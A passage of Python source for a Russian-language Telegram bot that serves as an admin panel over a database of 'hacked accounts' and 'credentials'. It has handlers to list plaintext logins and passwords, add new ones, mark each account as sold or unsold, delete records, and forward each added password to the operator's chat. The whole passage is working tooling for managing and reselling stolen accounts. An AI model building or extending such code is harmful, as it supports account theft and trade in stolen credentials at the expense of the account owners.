            bot.answer_callback_query(call.id)
            return
        elif call.data == 'db_view':
            keyboard = types.InlineKeyboardMarkup(row_width=2)
            keyboard.add(
                types.InlineKeyboardButton("👥 Пользователи", callback_data="db_view_users"),
                types.InlineKeyboardButton("🔐 Пароли", callback_data="db_view_credentials"),
                types.InlineKeyboardButton("💻 Взломанные аккаунты", callback_data="db_view_hacked"),
                types.InlineKeyboardButton("🔙 Назад", callback_data="db_main_menu")
            )
            logger.debug(f"Отправка меню просмотра данных для {chat_id}")
            bot.edit_message_text(
                chat_id=chat_id,
                message_id=call.message.message_id,
                text="🔍 *Выберите таблицу для просмотра*:",
                parse_mode='Markdown',
                reply_markup=keyboard
            )
        elif call.data == 'db_add':
            keyboard = types.InlineKeyboardMarkup(row_width=2)
            keyboard.add(
                types.InlineKeyboardButton("💾 В hacked", callback_data="db_add_hacked"),
                types.InlineKeyboardButton("🔐 В credentials", callback_data="db_add_cred"),
                types.InlineKeyboardButton("👤 Пользователь", callback_data="db_add_user"),
                types.InlineKeyboardButton("🔙 Назад", callback_data="db_main_menu")
            )
            logger.debug(f"Отправка меню добавления данных для {chat_id}")
            bot.edit_message_text(
                chat_id=chat_id,
                message_id=call.message.message_id,
                text="➕ *Куда добавить данные?*:",
                parse_mode='Markdown',
                reply_markup=keyboard
            )
        elif call.data == 'db_delete':
            keyboard = types.InlineKeyboardMarkup(row_width=2)
            keyboard.add(
                types.InlineKeyboardButton("🔐 Удалить пароль", callback_data="db_delete_cred"),
                types.InlineKeyboardButton("💾 Удалить hacked", callback_data="db_delete_hacked"),
                types.InlineKeyboardButton("👤 Удалить пользователя", callback_data="db_delete_user"),
                types.InlineKeyboardButton("🔙 Назад", callback_data="db_main_menu")
            )
            logger.debug(f"Отправка меню удаления данных для {chat_id}")
            bot.edit_message_text(
                chat_id=chat_id,
                message_id=call.message.message_id,
                text="🗑 *Что удалить?*:",
                parse_mode='Markdown',
                reply_markup=keyboard
            )
        bot.answer_callback_query(call.id)
        logger.info(f"Кнопка {call.data} успешно обработана для {chat_id}")
    except Exception as e:
        logger.error(f"Ошибка обработки кнопки {call.data} для {chat_id}: {e}")
        bot.send_message(chat_id, "❌ *Ошибка обработки кнопки! Попробуйте снова.*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)

@bot.callback_query_handler(func=lambda call: call.data.startswith('db_view_'))
def handle_db_view_buttons(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Просмотр {call.data} от {chat_id}")
    access = check_access(chat_id, 'database')
    if access:
        logger.warning(f"Доступ запрещён для просмотра {call.data}: {access}")
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        logger.error(f"База данных недоступна для просмотра {call.data}")
        bot.send_message(chat_id, "❌ *База данных недоступна!*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
        return
    try:
        with conn.cursor() as c:
            if call.data == 'db_view_users':
                logger.debug(f"Запрос пользователей для {chat_id}")
                c.execute("SELECT chat_id, prefix, username, subscription_end FROM users")
                users = c.fetchall()
                if not users:
                    logger.info(f"Пользователи не найдены для {chat_id}")
                    bot.send_message(chat_id, "📭 *Список пользователей пуст.*", parse_mode='Markdown')
                else:
                    for idx, (chat_id_db, prefix, username_db, sub_end) in enumerate(users, 1):
                        response = (
                            f"👤 *Пользователь #{idx}*: `{chat_id_db}`\n"
                            f"🔑 *Префикс*: `{prefix}`\n"
                            f"🕒 *Подписка до*: {format_time(sub_end)}\n"
                            f"📛 *Юзернейм*: @{username_db or 'Неизвестно'}\n"
                        )
                        keyboard = types.InlineKeyboardMarkup()
                        keyboard.add(
                            types.InlineKeyboardButton(
                                f"🗑 Удалить #{idx}",
                                callback_data=f"db_delete_user_{chat_id_db}_{idx}"
                            )
                        )
                        bot.send_message(
                            chat_id,
                            response,
                            reply_markup=keyboard,
                            parse_mode='Markdown'
                        )
                        logger.debug(f"Отправлен пользователь #{idx}: {chat_id_db}")
            elif call.data == 'db_view_credentials':
                logger.debug(f"Запрос паролей для {chat_id}")
                c.execute("SELECT login, password, added_time FROM credentials")
                credentials = c.fetchall()
                if not credentials:
                    logger.info(f"Пароли не найдены для {chat_id}")
                    bot.send_message(chat_id, "📭 *Список паролей пуст.*", parse_mode='Markdown')
                else:
                    for idx, (login, password, added_time) in enumerate(credentials, 1):
                        response = (
                            f"🔐 *Логин #{idx}*: `{login}`\n"
                            f"🔒 *Пароль*: `{password}`\n"
                            f"🕒 *Добавлено*: {format_time(added_time)}\n"
                        )
                        keyboard = types.InlineKeyboardMarkup()
                        keyboard.add(
                            types.InlineKeyboardButton(
                                f"🗑 Удалить #{idx}",
                                callback_data=f"db_delete_cred_{login}_{idx}"
                            )
                        )
                        bot.send_message(
                            chat_id,
                            response,
                            reply_markup=keyboard,
                            parse_mode='Markdown'
                        )
                        logger.debug(f"Отправлен пароль #{idx}: {login}")
            elif call.data == 'db_view_hacked':
                logger.debug(f"Запрос взломанных аккаунтов для {chat_id}")
                c.execute("SELECT login, password, sold_status, hack_date FROM hacked_accounts")
                hacked = c.fetchall()
                if not hacked:
                    logger.info(f"Взломанные аккаунты не найдены для {chat_id}")
                    bot.send_message(chat_id, "📭 *Список взломанных аккаунтов пуст.*", parse_mode='Markdown')
                else:
                    for idx, (login, password, status, hack_date) in enumerate(hacked, 1):
                        response = (
                            f"💻 *Логин #{idx}*: `{login}`\n"
                            f"🔒 *Пароль*: `{password}`\n"
                            f"📊 *Статус*: `{status}`\n"
                            f"🕒 *Взломан*: {format_time(hack_date)}\n"
                        )
                        keyboard = types.InlineKeyboardMarkup()
                        keyboard.add(
                            types.InlineKeyboardButton(
                                f"🗑 Удалить #{idx}",
                                callback_data=f"db_delete_hacked_{login}_{idx}"
                            )
                        )
                        bot.send_message(
                            chat_id,
                            response,
                            reply_markup=keyboard,
                            parse_mode='Markdown'
                        )
                        logger.debug(f"Отправлен взломанный аккаунт #{idx}: {login}")
            keyboard = types.InlineKeyboardMarkup()
            keyboard.add(
                types.InlineKeyboardButton("🔙 Назад", callback_data="db_main_menu")
            )
            bot.send_message(
                chat_id,
                "⚙️ *Вернуться в меню базы?*:",
                reply_markup=keyboard,
                parse_mode='Markdown'
            )
            logger.info(f"Просмотр {call.data} успешно завершён для {chat_id}")
        bot.answer_callback_query(call.id)
    except Exception as e:
        logger.error(f"Ошибка просмотра {call.data} для {chat_id}: {e}")
        bot.send_message(chat_id, "❌ *Ошибка просмотра данных! Попробуйте снова.*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
    finally:
        conn.close()

@bot.callback_query_handler(func=lambda call: call.data.startswith('db_delete_'))
def handle_db_delete_buttons(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Удаление {call.data} от {chat_id}")
    access = check_access(chat_id, 'database')
    if access:
        logger.warning(f"Доступ запрещён для удаления {call.data}: {access}")
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        logger.error(f"База данных недоступна для удаления {call.data}")
        bot.send_message(chat_id, "❌ *База данных недоступна!*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
        return
    try:
        with conn.cursor() as c:
            if call.data.startswith('db_delete_cred_'):
                _, login, idx = call.data.split('_', 2)
                logger.debug(f"Попытка удаления логина {login} (idx: {idx})")
                c.execute("SELECT login FROM credentials WHERE login = %s", (login,))
                if not c.fetchone():
                    logger.warning(f"Логин {login} не найден для удаления")
                    bot.send_message(chat_id, f"❌ *Логин `{login}` не найден!*", parse_mode='Markdown')
                    bot.answer_callback_query(call.id)
                    return
                c.execute("DELETE FROM credentials WHERE login = %s", (login,))
                conn.commit()
                logger.info(f"Логин {login} успешно удалён")
                bot.edit_message_text(
                    chat_id=chat_id,
                    message_id=call.message.message_id,
                    text=f"✅ *Логин #{idx} `{login}` удалён!*",
                    parse_mode='Markdown'
                )
                bot.send_message(
                    ADMIN_CHAT_ID,
                    f"🗑 *Пароль удалён*\n👤 *Логин*: `{login}`\n👤 *Удалил*: {chat_id}",
                    parse_mode='Markdown'
                )
            elif call.data.startswith('db_delete_hacked_'):
                _, login, idx = call.data.split('_', 2)
                logger.debug(f"Попытка удаления hacked аккаунта {login} (idx: {idx})")
                c.execute("SELECT login FROM hacked_accounts WHERE login = %s", (login,))
                if not c.fetchone():
                    logger.warning(f"Аккаунт {login} не найден для удаления")
                    bot.send_message(chat_id, f"❌ *Аккаунт `{login}` не найден!*", parse_mode='Markdown')
                    bot.answer_callback_query(call.id)
                    return
                c.execute("DELETE FROM hacked_accounts WHERE login = %s", (login,))
                conn.commit()
                logger.info(f"Аккаунт {login} успешно удалён из hacked")
                bot.edit_message_text(
                    chat_id=chat_id,
                    message_id=call.message.message_id,
                    text=f"✅ *Аккаунт #{idx} `{login}` удалён из hacked!*",
                    parse_mode='Markdown'
                )
                bot.send_message(
                    ADMIN_CHAT_ID,
                    f"🗑 *Аккаунт удалён из hacked*\n👤 *Логин*: `{login}`\n👤 *Удалил*: {chat_id}",
                    parse_mode='Markdown'
                )
            elif call.data.startswith('db_delete_user_'):
                _, user_chat_id, idx = call.data.split('_', 2)
                logger.debug(f"Попытка удаления пользователя {user_chat_id} (idx: {idx})")
                if user_chat_id == ADMIN_CHAT_ID:
                    logger.warning(f"Попытка удаления Создателя {user_chat_id}")
                    bot.send_message(chat_id, "🔒 *Нельзя удалить Создателя!*", parse_mode='Markdown')
                    bot.answer_callback_query(call.id)
                    return
                c.execute("SELECT chat_id FROM users WHERE chat_id = %s", (user_chat_id,))
                if not c.fetchone():
                    logger.warning(f"Пользователь {user_chat_id} не найден для удаления")
                    bot.send_message(chat_id, f"❌ *Пользователь `{user_chat_id}` не найден!*", parse_mode='Markdown')
                    bot.answer_callback_query(call.id)
                    return
                c.execute("DELETE FROM users WHERE chat_id = %s", (user_chat_id,))
                conn.commit()
                logger.info(f"Пользователь {user_chat_id} успешно удалён")
                bot.edit_message_text(
                    chat_id=chat_id,
                    message_id=call.message.message_id,
                    text=f"✅ *Пользователь #{idx} `{user_chat_id}` удалён!*",
                    parse_mode='Markdown'
                )
                bot.send_message(
                    ADMIN_CHAT_ID,
                    f"🗑 *Пользователь удалён*\n🆔 *Chat ID*: `{user_chat_id}`\n👤 *Удалил*: {chat_id}",
                    parse_mode='Markdown'
                )
        bot.answer_callback_query(call.id)
        logger.info(f"Удаление {call.data} успешно завершено для {chat_id}")
    except Exception as e:
        logger.error(f"Ошибка удаления {call.data} для {chat_id}: {e}")
        bot.send_message(chat_id, "❌ *Ошибка удаления! Попробуйте снова.*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
    finally:
        conn.close()

@bot.callback_query_handler(func=lambda call: call.data.startswith('db_add_') or call.data == 'db_main_menu')
def handle_db_add_buttons(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Кнопка {call.data} от {chat_id}")
    access = check_access(chat_id, 'database')
    if access:
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    if call.data == 'db_main_menu':
        response = "🗄 *Управление базой данных*\nВыберите действие:"
        keyboard = types.InlineKeyboardMarkup(row_width=2)
        keyboard.add(
            types.InlineKeyboardButton("🔍 Просмотреть данные", callback_data="db_view"),
            types.InlineKeyboardButton("➕ Добавить данные", callback_data="db_add"),
            types.InlineKeyboardButton("🗑 Удалить данные", callback_data="db_delete")
        )
        bot.edit_message_text(
            chat_id=chat_id,
            message_id=call.message.message_id,
            text=response,
            parse_mode='Markdown',
            reply_markup=keyboard
        )
        bot.answer_callback_query(call.id)
        return
    elif call.data == 'db_add_hacked':
        msg = bot.send_message(chat_id, "📝 *Введите логин для добавления в hacked*:", parse_mode='Markdown')
        bot.register_next_step_handler(msg, process_db_add_hacked_login)
    elif call.data == 'db_add_cred':
        msg = bot.send_message(chat_id, "📝 *Введите логин для добавления в credentials*:", parse_mode='Markdown')
        bot.register_next_step_handler(msg, process_db_add_cred_login)
    elif call.data == 'db_add_user':
        msg = bot.send_message(chat_id, "📝 *Введите Chat ID пользователя*:", parse_mode='Markdown')
        bot.register_next_step_handler(msg, process_db_add_user)
    bot.answer_callback_query(call.id)

def process_db_add_hacked_login(message):
    chat_id = str(message.chat.id)
    login = sanitize_input(message.text)
    logger.info(f"Логин: {login} от {chat_id}")
    if not login:
        bot.reply_to(message, "❌ *Логин не может быть пустым!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "🔒 *Введите пароль*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_db_add_hacked_password(m, login))

def process_db_add_hacked_password(message, login):
    chat_id = str(message.chat.id)
    password = sanitize_input(message.text)
    logger.info(f"Пароль для {login}: {password}")
    if not password:
        bot.reply_to(message, "❌ *Пароль не может быть пустым!*", parse_mode='Markdown')
        return
    keyboard = types.InlineKeyboardMarkup()
    keyboard.add(
        types.InlineKeyboardButton("✅ Продан", callback_data=f"hacked_add_status_sold_{login}_{password}"),
        types.InlineKeyboardButton("⛔ Непродан", callback_data=f"hacked_add_status_not_sold_{login}_{password}")
    )
    bot.reply_to(message, "📊 *Выберите статус аккаунта*:", reply_markup=keyboard, parse_mode='Markdown')

@bot.callback_query_handler(func=lambda call: call.data.startswith('hacked_add_status_'))
def handle_hacked_add_status(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Статус {call.data} от {chat_id}")
    access = check_access(chat_id, 'database')
    if access:
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    try:
        _, status, login, password = call.data.split('_', 3)
        sold_status = "Продан" if status == "sold" else "Непродан"
        conn = get_db_connection()
        if not conn:
            bot.send_message(chat_id, "❌ *База данных недоступна!*", parse_mode='Markdown')
            bot.answer_callback_query(call.id)
            return
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO hacked_accounts (login, password, hack_date, prefix, sold_status, linked_chat_id)
                VALUES (%s, %s, %s, %s, %s, %s)
                ON CONFLICT (login) DO UPDATE
                SET password = EXCLUDED.password,
                    hack_date = EXCLUDED.hack_date,
                    prefix = EXCLUDED.prefix,
                    sold_status = EXCLUDED.sold_status,
                    linked_chat_id = EXCLUDED.linked_chat_id
                ''',
                (login, password, get_current_time().isoformat(), "Админ", sold_status, chat_id)
            )
            conn.commit()
            bot.send_message(
                chat_id,
                f"✅ *Аккаунт `{login}` добавлен в hacked!*\n📊 *Статус*: {sold_status}",
                parse_mode='Markdown'
            )
            bot.send_message(
                ADMIN_CHAT_ID,
                f"💾 *Аккаунт добавлен в hacked*\n👤 *Логин*: `{login}`\n🔒 *Пароль*: `{password}`\n📊 *Статус*: {sold_status}\n➕ *Добавил*: {chat_id}",
                parse_mode='Markdown'
            )
        bot.answer_callback_query(call.id)
    except Exception as e:
        logger.error(f"Ошибка добавления hacked: {e}")
        bot.send_message(chat_id, "❌ *Ошибка добавления!*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
    finally:
        conn.close()

def process_db_add_cred_login(message):
    chat_id = str(message.chat.id)
    login = sanitize_input(message.text)
    logger.info(f"Логин для credentials: {login} от {chat_id}")
    if not login:
        bot.reply_to(message, "❌ *Логин не может быть пустым!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "🔒 *Введите пароль*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_db_add_cred_password(m, login))

def process_db_add_cred_password(message, login):
    chat_id = str(message.chat.id)
    password = sanitize_input(message.text)
    logger.info(f"Пароль для {login} от {chat_id}")
    if not password:
        bot.reply_to(message, "❌ *Пароль не может быть пустым!*", parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        bot.reply_to(message, "❌ *База данных недоступна!*", parse_mode='Markdown')
        return
    try:
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO credentials (login, password, added_time, added_by)
                VALUES (%s, %s, %s, %s)
                ON CONFLICT (login) DO UPDATE
                SET password = EXCLUDED.password,
                    added_time = EXCLUDED.added_time,
                    added_by = EXCLUDED.added_by
                ''',
                (login, password, get_current_time().isoformat(), chat_id)
            )
            conn.commit()
            bot.reply_to(
                message,
                f"✅ *Пароль для `{login}` добавлен в credentials!*",
                parse_mode='Markdown'
            )
            bot.send_message(
                ADMIN_CHAT_ID,
                f"🔐 *Добавлен пароль*\n👤 *Логин*: `{login}`\n🔒 *Пароль*: `{password}`\n➕ *Добавил*: {chat_id}",
                parse_mode='Markdown'
            )
    except Exception as e:
        logger.error(f"Ошибка добавления: {e}")
        bot.reply_to(message, "❌ *Ошибка добавления!*", parse_mode='Markdown')
    finally:
        conn.close()

def process_db_add_user(message):
    chat_id = str(message.chat.id)
    user_chat_id = sanitize_input(message.text)
    logger.info(f"Добавление пользователя {user_chat_id} от {chat_id}")
    if not user_chat_id or not user_chat_id.isdigit():
        bot.reply_to(message, "❌ *Chat ID должен быть числом!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "📝 *Введите префикс (например, Посетитель, Админ, ТехПомощник)*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_db_add_user_prefix(m, user_chat_id))

def process_db_add_user_prefix(message, user_chat_id):
    chat_id = str(message.chat.id)
    prefix = sanitize_input(message.text)
    logger.info(f"Префикс {prefix} для {user_chat_id} от {chat_id}")
    if not prefix:
        bot.reply_to(message, "❌ *Префикс не может быть пустым!*", parse_mode='Markdown')
        return
    valid_prefixes = ['Посетитель', 'Админ', 'ТехПомощник', 'Создатель']
    if prefix not in valid_prefixes:
        bot.reply_to(message, f"❌ *Недопустимый префикс! Допустимые: {', '.join(valid_prefixes)}*", parse_mode='Markdown')
        return
    if prefix == 'Создатель' and chat_id != ADMIN_CHAT_ID:
        bot.reply_to(message, "🔒 *Префикс Создатель только для главного администратора!*", parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        bot.reply_to(message, "❌ *База данных недоступна!*", parse_mode='Markdown')
        return
    try:
        with conn.cursor() as c:
            subscription_end = (get_current_time() + timedelta(days=30)).isoformat()
            c.execute(
                '''
                INSERT INTO users (chat_id, prefix, subscription_end, last_activity, ip_hash, username)
                VALUES (%s, %s, %s, %s, %s, %s)
                ON CONFLICT (chat_id) DO UPDATE
                SET prefix = EXCLUDED.prefix,
                    subscription_end = EXCLUDED.subscription_end,
                    last_activity = EXCLUDED.last_activity,
                    ip_hash = EXCLUDED.ip_hash
                ''',
                (user_chat_id, prefix, subscription_end, get_current_time().isoformat(), hash_data(user_chat_id), 'Неизвестно')
            )
            conn.commit()
            bot.reply_to(
                message,
                f"✅ *Пользователь `{user_chat_id}` добавлен с префиксом `{prefix}`!*",
                parse_mode='Markdown'
            )
            bot.send_message(
                ADMIN_CHAT_ID,
                f"👤 *Добавлен пользователь*\n🆔 *Chat ID*: `{user_chat_id}`\n🔑 *Префикс*: `{prefix}`\n➕ *Добавил*: {chat_id}",
                parse_mode='Markdown'
            )
    except Exception as e:
        logger.error(f"Ошибка добавления пользователя: {e}")
        bot.reply_to(message, "❌ *Ошибка добавления!*", parse_mode='Markdown')
    finally:
        conn.close()

@bot.message_handler(commands=['viewdb'])
def viewdb_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/viewdb от {chat_id}")
    access = check_access(chat_id, 'viewdb')
    if access:
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    keyboard = types.InlineKeyboardMarkup(row_width=2)
    keyboard.add(
        types.InlineKeyboardButton("👥 Пользователи", callback_data="db_view_users"),
        types.InlineKeyboardButton("🔐 Пароли", callback_data="db_view_credentials"),
        types.InlineKeyboardButton("💻 Взломанные аккаунты", callback_data="db_view_hacked")
    )
    try:
        bot.reply_to(message, "🔍 *Выберите таблицу для просмотра*:", reply_markup=keyboard, parse_mode='Markdown')
        user = get_user(chat_id)
        if user:
            save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
    except Exception as e:
        logger.error(f"Ошибка /viewdb: {e}")
        bot.reply_to(message, "❌ *Ошибка выполнения команды!*", parse_mode='Markdown')

@bot.message_handler(commands=['techstop'])
def techstop_cmd(message):
    global tech_mode, tech_reason, tech_end_time
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/techstop от {chat_id}")
    access = check_access(chat_id, 'techstop')
    if access:
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    if tech_mode:
        bot.reply_to(message, f"🛠 *Техперерыв уже активен до {format_time(tech_end_time)}!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "📝 *Введите причину техперерыва*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_techstop_reason(m, username))

def process_techstop_reason(message, username):
    global tech_mode, tech_reason, tech_end_time
    chat_id = str(message.chat.id)
    tech_reason = sanitize_input(message.text)
    logger.info(f"Причина техперерыва от {chat_id}: {tech_reason}")
    if not tech_reason:
        bot.reply_to(message, "❌ *Причина не может быть пустой!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "🕒 *Введите длительность в минутах*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_techstop_duration(m, username))

def process_techstop_duration(message, username):
    global tech_mode, tech_reason, tech_end_time
    chat_id = str(message.chat.id)
    duration = sanitize_input(message.text)
    logger.info(f"Длительность техперерыва от {chat_id}: {duration}")
    try:
        duration = int(duration)
        if duration <= 0:
            raise ValueError("Длительность должна быть положительной")
    except ValueError:
        bot.reply_to(message, "❌ *Длительность должна быть числом больше 0!*", parse_mode='Markdown')
        return
    tech_mode = True
    tech_end_time = get_current_time() + timedelta(minutes=duration)
    response = (
        f"🛠 *Техперерыв активирован!*\n"
        f"📝 *Причина*: {tech_reason}\n"
        f"🕒 *Окончание*: {format_time(tech_end_time)}"
    )
    try:
        bot.reply_to(message, response, parse_mode='Markdown')
        bot.send_message(
            ADMIN_CHAT_ID,
            f"🛠 *Техперерыв включён*\n📝 *Причина*: {tech_reason}\n🕒 *До*: {format_time(tech_end_time)}\n👤 *Включил*: {chat_id}",
            parse_mode='Markdown'
        )
        for tech_id in get_tech_assistants():
            if tech_id != chat_id:
                try:
                    bot.send_message(
                        tech_id,
                        response,
                        parse_mode='Markdown'
                    )
                except Exception as e:
                    logger.error(f"Ошибка уведомления техпомощника {tech_id}: {e}")
        user = get_user(chat_id)
        if user:
            save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
        threading.Thread(target=techstop_timer, args=(duration, chat_id)).start()
    except Exception as e:
        logger.error(f"Ошибка активации техперерыва: {e}")
        bot.reply_to(message, "❌ *Ошибка активации техперерыва!*", parse_mode='Markdown')

def techstop_timer(duration, chat_id):
    global tech_mode, tech_reason, tech_end_time
    logger.info(f"Таймер техперерыва на {duration} минут")
    try:
        time.sleep(duration * 60)
        if tech_mode and tech_end_time <= get_current_time():
            tech_mode = False
            tech_reason = ""
            tech_end_time = None
            response = "✅ *Техперерыв завершён!*"
            bot.send_message(chat_id, response, parse_mode='Markdown')
            bot.send_message(ADMIN_CHAT_ID, response, parse_mode='Markdown')
            for tech_id in get_tech_assistants():
                try:
                    bot.send_message(tech_id, response, parse_mode='Markdown')
                except Exception as e:
                    logger.error(f"Ошибка уведомления техпомощника {tech_id}: {e}")
    except Exception as e:
        logger.error(f"Ошибка таймера техперерыва: {e}")

@bot.message_handler(commands=['techstopoff'])
def techstopoff_cmd(message):
    global tech_mode, tech_reason, tech_end_time
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/techstopoff от {chat_id}")
    access = check_access(chat_id, 'techstopoff')
    if access:
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    if not tech_mode:
        bot.reply_to(message, "✅ *Техперерыв уже отключён!*", parse_mode='Markdown')
        return
    tech_mode = False
    tech_reason = ""
    tech_end_time = None
    response = "✅ *Техперерыв принудительно завершён!*"
    try:
        bot.reply_to(message, response, parse_mode='Markdown')
        bot.send_message(
            ADMIN_CHAT_ID,
            f"✅ *Техперерыв отключён*\n👤 *Отключил*: {chat_id}",
            parse_mode='Markdown'
        )
        for tech_id in get_tech_assistants():
            if tech_id != chat_id:
                try:
                    bot.send_message(tech_id, response, parse_mode='Markdown')
                except Exception as e:
                    logger.error(f"Ошибка уведомления техпомощника {tech_id}: {e}")
        user = get_user(chat_id)
        if user:
            save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
    except Exception as e:
        logger.error(f"Ошибка отключения техперерыва: {e}")
        bot.reply_to(message, "❌ *Ошибка отключения техперерыва!*", parse_mode='Markdown')

@bot.message_handler(commands=['adprefix'])
def adprefix_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/adprefix от {chat_id}")
    access = check_access(chat_id, 'adprefix')
    if access:
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "📝 *Введите Chat ID пользователя*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_adprefix_chat_id(m, username))

def process_adprefix_chat_id(message, username):
    chat_id = str(message.chat.id)
    user_chat_id = sanitize_input(message.text)
    logger.info(f"Chat ID для adprefix: {user_chat_id} от {chat_id}")
    if not user_chat_id or not user_chat_id.isdigit():
        bot.reply_to(message, "❌ *Chat ID должен быть числом!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "📝 *Введите новый префикс (например, Админ, ТехПомощник)*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_adprefix_prefix(m, user_chat_id, username))

def process_adprefix_prefix(message, user_chat_id, username):
    chat_id = str(message.chat.id)
    prefix = sanitize_input(message.text)
    logger.info(f"Префикс {prefix} для {user_chat_id} от {chat_id}")
    if not prefix:
        bot.reply_to(message, "❌ *Префикс не может быть пустым!*", parse_mode='Markdown')
        return
    valid_prefixes = ['Посетитель
